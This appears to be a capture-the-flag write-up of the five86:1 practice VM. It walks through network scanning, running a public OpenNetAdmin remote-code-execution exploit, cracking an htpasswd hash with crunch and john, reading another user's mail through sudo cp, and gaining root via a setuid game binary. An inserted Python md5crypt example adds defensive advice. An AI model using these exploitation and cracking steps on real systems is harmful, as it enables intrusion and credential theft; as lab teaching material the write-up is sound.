I'm here again to present another boot2root VM to you. This time I bring you five86: 1.
This machine was released on 8 January 2020 and can be downloaded at five86:1.
Without further ado, let's get to what matters!
As always, we start with host discovery:
```
kali@kali:~$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 9 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 540
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:14      1      60  Unknown vendor
 192.168.56.100  08:00:27:c2:ed:df      3     180  PCS Systemtechnik GmbH
 192.168.56.112  08:00:27:38:60:aa      5     300  PCS Systemtechnik GmbH
```
Now that we have identified our target, we can discover which services exist on this host:
```
kali@kali:~$ sudo nmap -sS -sV -sC -p- 192.168.56.112
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-05 21:34 EDT
Nmap scan report for 192.168.56.112
Host is up (0.00014s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 69:e6:3c:bf:72:f7:a0:00:f9:d9:f4:1d:68:e2:3c:bd (RSA)
|   256 45:9e:c7:1e:9f:5b:d3:ce:fc:17:56:f2:f6:42:ab:dc (ECDSA)
|_  256 ae:0a:9e:92:64:5f:86:20:c4:11:44:e0:58:32:e5:05 (ED25519)
80/tcp    open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/ona
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
10000/tcp open  http    MiniServ 1.920 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:38:60:AA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.76 seconds
kali@kali:~$
```
From the nmap output we identify a web application running on TCP port 80 and an /ona entry in the robots.txt file.
Accessing that page, we identify OpenNetAdmin.
Since the application itself has already warned us that it is running an outdated version, let's try to find some kind of exploit for v18.1.1.
```
kali@kali:~$ searchsploit OpenNetAdmin
----------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                   |  Path
                                                                 | (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution                    | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit)     | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution                      | exploits/php/webapps/47691.sh
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
kali@kali:~$ searchsploit -p 47691
  Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47691
     Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
File Type: ASCII text, with CRLF line terminators
kali@kali:~$
```
After copying the exploit to our directory, we notice that it is in DOS format.
Just type the command :set ff=unix in vi to change the format.
Now we can run the exploit without further trouble.
```
root@kali:~/exploits# chmod +x 47691.sh
root@kali:~/exploits# ./47691.sh http://192.168.56.112/ona/
root@kali:~/exploits# ./47691.sh http://192.168.56.112/ona/
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
```
Searching for all files owned by the www-data user (note that the command as typed omits the dash in -type f, which is why directories such as /run/lock/apache2 also appear in the list)…
```
$ find / type f -user www-data | grep -v /proc
/run/lock/apache2
/var/cache/apache2/mod_cache_disk
/var/www/html/reports/.htaccess
/var/log/ona.log
/opt/ona/www/local/config
$
```
we identify that access to the reports directory is restricted by the htaccess configuration.
```
$ cat /var/www/html/reports/.htaccess
AuthType Basic
AuthName "Restricted Area"
AuthUserFile /var/www/.htpasswd
require valid-user
$
```
Accessing the htpasswd file, we identify the access credential of the user douglas. We also find a hint for building a dictionary with a specific length and character set.
```
$ cat /var/www/.htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1

# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
$
```
For this task, we will use crunch.
```
root@kali:~# crunch 10 10 aefhrt > pwd.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
root@kali:~#
```
And crack the password with john.
```
root@kali:~# john --wordlist=pwd.txt hash.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fatherrrrr       (douglas)
1g 0:00:01:28 DONE (2020-04-05 22:57) 0.01131g/s 245660p/s 245660c/s 245660C/s fatherhara..fatherrtet
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#
```
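To see why the hint above makes this feasible, here is an added Python example (not part of the original post or of the five86 VM) that implements the Apache APR1 md5crypt scheme used in that .htpasswd line, verifies a candidate against the stored hash the way a web server would, and computes the size of the exhaustive list crunch generated from the stated charset and length.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: 6 bits per character, least significant first."""
    out = ""
    for _ in range(count):
        out += ITOA64[value & 0x3F]
        value >>= 6
    return out


def apr1_md5(password: str, salt: str, magic: str = "$apr1$") -> str:
    """Apache APR1 / md5crypt digest (magic "$1$" gives the classic crypt form)."""
    pw, sl = password.encode(), salt[:8].encode()
    ctx = hashlib.md5(pw + magic.encode() + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    for left in range(len(pw), 0, -16):
        ctx.update(alt[: min(16, left)])
    i = len(pw)
    while i:
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):  # 1000 MD5 rounds: the only slowdown apr1 offers an attacker
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    enc = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    enc += _to64(final[11], 2)
    return f"{magic}{sl.decode()}${enc}"


def verify_htpasswd(entry: str, candidate: str) -> bool:
    """Check a 'user:$apr1$salt$hash' line against a candidate, comparing in constant time."""
    stored = entry.split(":", 1)[1]
    _, magic, salt, _digest = stored.split("$")
    return hmac.compare_digest(apr1_md5(candidate, salt, f"${magic}$"), stored)


def wordlist_size(charset: str, length: int) -> tuple[int, int]:
    """Candidates and bytes of an exhaustive crunch-style list (one newline per line)."""
    count = len(set(charset)) ** length
    return count, count * (length + 1)
```

The 60466176-line, 665127936-byte figures crunch printed fall straight out of 6^10 and 11 bytes per line; the defensive lesson is that apr1 is cheap MD5 stretching with no memory cost, so htpasswd entries should be created with a slow hash (htpasswd -B for bcrypt) and the directory protected by something stronger than a guessable password.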
Now we just need to check whether the password was reused.
```
root@kali:~# ssh douglas@192.168.56.112
douglas@192.168.56.112's password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
douglas@five86-1:~$
```
Let's try to escalate privileges to root.
We quickly identify that douglas can run the cp command with jen's privileges.
```
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User douglas may run the following commands on five86-1:
    (jen) NOPASSWD: /bin/cp
douglas@five86-1:~$
```
The idea now is to find out whether there is any file owned by jen that we can copy (again with -type f typed without its dash, which is why the /home/jen directory shows up too).
```
douglas@five86-1:~$ find / type f -user jen 2> /dev/null | grep -Ev "/proc|/sys"
/var/mail/jen
/home/jen
```
The e-mail is a good option.
```
douglas@five86-1:/tmp$ sudo -u jen /bin/cp --no-preserve=all /var/mail/jen mail
```
We manage to identify the password of the user moss in the e-mail sent to jen.
```
douglas@five86-1:/tmp$ cat mail
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
        (envelope-from <roy@five86-1>)
        id 1imZBc-0001FU-El
        for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500

Hi Jen,

As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.

But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!

Moss will understand (ha ha ha ha).

Tanks,

Roy
douglas@five86-1:/tmp$ su - moss
Password:
moss@five86-1:~$
```
Once authenticated as the user moss, we identify a games directory.
```
moss@five86-1:~$ ls -la
total 12
drwx------ 3 moss moss 4096 Jan  1 23:05 .
drwxr-xr-x 7 root root 4096 Jan  1 04:37 ..
lrwxrwxrwx 1 moss moss    9 Jan  1 23:05 .bash_history -> /dev/null
drwx------ 2 moss moss 4096 Jan  1 03:53 .games
```
The game that caught our attention was upyourgame, since it is owned by root and has the setuid bit set.
```
moss@five86-1:~/.games$ ls -la
total 28
drwx------ 2 moss moss  4096 Jan  1 03:53 .
drwx------ 3 moss moss  4096 Jan  1 23:05 ..
lrwxrwxrwx 1 moss moss    21 Jan  1 03:21 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss    14 Jan  1 03:23 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss    21 Jan  1 03:21 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss    17 Jan  1 03:22 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss    20 Jan  1 03:23 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss    15 Jan  1 03:23 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss    20 Jan  1 03:22 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss    17 Jan  1 03:19 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss    25 Jan  1 03:21 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss    17 Jan  1 03:22 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss    16 Jan  1 03:22 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss    17 Jan  1 03:20 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 16824 Jan  1 03:52 upyourgame
lrwxrwxrwx 1 moss moss    16 Jan  1 03:22 worms -> /usr/games/worms
moss@five86-1:~/.games$
```
Using strings, we identify that it is a question-and-answer game. The most interesting part, however, is the call to /bin/sh at the end.
```
moss@five86-1:~/.games$ strings upyourgame
...
Would you like to play a game?
Could you please repeat that?
Nope, you'll need to enter that again.
You entered: No. Is this correct?
We appear to have a problem? Do we have a problem?
Made in Britain.
/bin/sh
;*3$"
...
```
So…
```
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game?
no
Could you please repeat that?
no
Nope, you'll need to enter that again.
no
You entered: No. Is this correct?
no
We appear to have a problem? Do we have a problem?
no
Made in Britain.
# id
uid=0(root) gid=1001(moss) groups=1001(moss)
#
```

```
# cd /root
# ls
flag.txt
# cat flag.txt
8f3b38dd95eccf600593da4522251746
#
```
References:
https://til.hashrocket.com/posts/hu3jlszfrf-change-dos-to-unix-text-file-format-in-vim